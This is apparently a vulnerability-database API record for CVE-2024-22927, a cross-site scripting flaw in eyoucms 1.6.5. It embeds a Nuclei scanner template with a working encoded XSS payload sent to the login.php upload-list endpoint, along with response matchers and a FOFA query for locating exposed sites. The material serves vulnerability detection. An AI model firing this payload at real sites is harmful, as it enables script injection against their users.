{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-22927/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-22927/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-22927/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-22927/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-22927/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-22927"},"sightings":{"href":"/api/v1/sightings/cve-2024-22927"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-22927.yaml","nuclei_template_severity":"medium","nuclei_template_yaml":"id: CVE-2024-22927\n\ninfo:\n  name: eyoucms v.1.6.5 - Cross-Site Scripting\n  author: ritikchaddha\n  severity: medium\n  description: |\n    Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n  impact: |\n    Allows attackers to execute malicious scripts on the victim's browser.\n  remediation: |\n    Upgrade eyoucms to version 1.6.6 or later to fix the XSS vulnerability.\n  reference:\n    - https://github.com/weng-xianhu/eyoucms/issues/57\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-22927\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n    cvss-score: 6.1\n    cve-id: CVE-2024-22927\n    cwe-id: CWE-79\n    epss-score: 0.01019\n    epss-percentile: 0.61804\n    cpe: cpe:2.3:a:eyoucms:eyoucms:1.6.5:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: eyoucms\n    product: eyoucms\n    fofa-query: \"title=\\\"eyoucms\\\"\"\n  tags: cve2024,cve,eyoucms,cms,xss,vuln,vkev\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn=\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'name=\"num\" value=\"1\"><ScRiPt >alert(document.domain)</ScRiPt>'\n          - 'id=\"eytime\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220711455b5aba6f4739da722dc269921d6d64cee7f9f3d1ed0dc99a2c77d9ac8ff02210088cdc3a6ecedbe390e7631b2dda16f598100433840d7c5e4d977d46784dfb1f0:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2024-22927"}